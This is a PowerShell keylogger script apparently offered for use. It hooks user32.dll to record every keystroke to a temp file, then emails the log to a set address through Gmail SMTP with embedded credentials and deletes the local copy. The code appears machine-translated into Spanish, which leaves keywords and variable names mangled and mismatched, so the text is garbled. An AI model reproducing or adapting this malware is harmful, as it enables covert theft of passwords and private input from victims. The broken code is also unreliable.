================================================== ===========================

1. ================================================== ===========================
2. -------------------------------------------------- --------------------------
3. KEYLOGGER BY YAGO
4. -------------------------------------------------- ---------------------------
5. ================================================== ===========================
6.  
7.  
8. # Editar solo esta sección!
9. $ TimeToRun = 2
10. $ De = "[email protected]"
11. $ Pase = "2@3calles"
12. $ To = "[email protected]"
13. $ Asunto = "Resultados del registrador de teclas"
14. $ body = "Resultados del keylogger"
15. $ SMTPServer = "smtp.gmail.com"
16. $ SMTPPort = "587"
17. $ credentials = new-object Management.Automation.PSCredential $ From, ($ Pass | ConvertTo-SecureString -AsPlainText -Force)
18. ############################
19.  
20.  
21. $ TimeStart = Get-Date
22. $ TimeEnd = $ timeStart.addminutes ($ TimeToRun)
23.  
24. #requires -Version 2
25. función Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
26. {
27. # Firmas para llamadas API
28. $ firmas = @ '
29. [DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
30. público estático externo externo GetAsyncKeyState (int virtualKeyCode);
31. [DllImport ("user32.dll", CharSet = CharSet.Auto)]
32. public static extern int GetKeyboardState (byte [] keystate);
33. [DllImport ("user32.dll", CharSet = CharSet.Auto)]
34. public static extern int MapVirtualKey (uint uCode, int uMapType);
35. [DllImport ("user32.dll", CharSet = CharSet.Auto)]
36. public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
37. '@
38.  
39. # cargar firmas y hacer que los miembros estén disponibles
40. $ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
41.  
42. # crear archivo de salida
43. $ null = New-Item -Path $ Path -ItemType File -Force
44.  
45. tratar
46. {
47.  
48. # crear bucle sin fin. Cuando el usuario presiona CTRL + C, finalmente bloquea
49. # se ejecuta y muestra las pulsaciones de teclas recopiladas
50. while ($ TimeEnd -ge $ TimeNow) {
51. Inicio-Sueño-Milisegundos 40
52.  
53. # escanea todos los códigos ASCII superiores a 8
54. para ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
55. # obtener el estado actual de la clave
56. $ state = $ API :: GetAsyncKeyState ($ ascii)
57.  
58. # se presiona la tecla?
59. if ($ estado -eq -32767) {
60. $ null = [consola] :: CapsLock
61.  
62. # traducir el código de escaneo a código real
63. $ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
64.  
65. # obtener el estado del teclado para teclas virtuales
66. $ kbstate = Byte de nuevo objeto [] 256
67. $ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
68.  
69. # preparar un StringBuilder para recibir la clave de entrada
70. $ mychar = New-Object -TypeName System.Text.StringBuilder
71.  
72. # traducir clave virtual
73. $ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
74.  
75. si ($ éxito)
76. {
77. # agregar clave al archivo de registro
78. [System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
79. }
80. }
81. }
82. $ TimeNow = Get-Date
83. }
84. }
85. finalmente
86. {
87. # abrir archivo de registro en el Bloc de notas
88. send-mailmessage -from $ from -to $ to -subject $ Asunto -body $ body -Attachment $ Path -smtpServer $ smtpServer -port $ SMTPPort -credential $ credentials -usessl
89. Remove-Item -Path $ Path -force
90. salida 1
91. }
92. }
93.  
94. # registra todas las pulsaciones de teclas hasta que se cancela la secuencia de comandos presionando CTRL + C
95. # luego abrirá el archivo con los códigos clave recopilados
96. Start-KeyLogger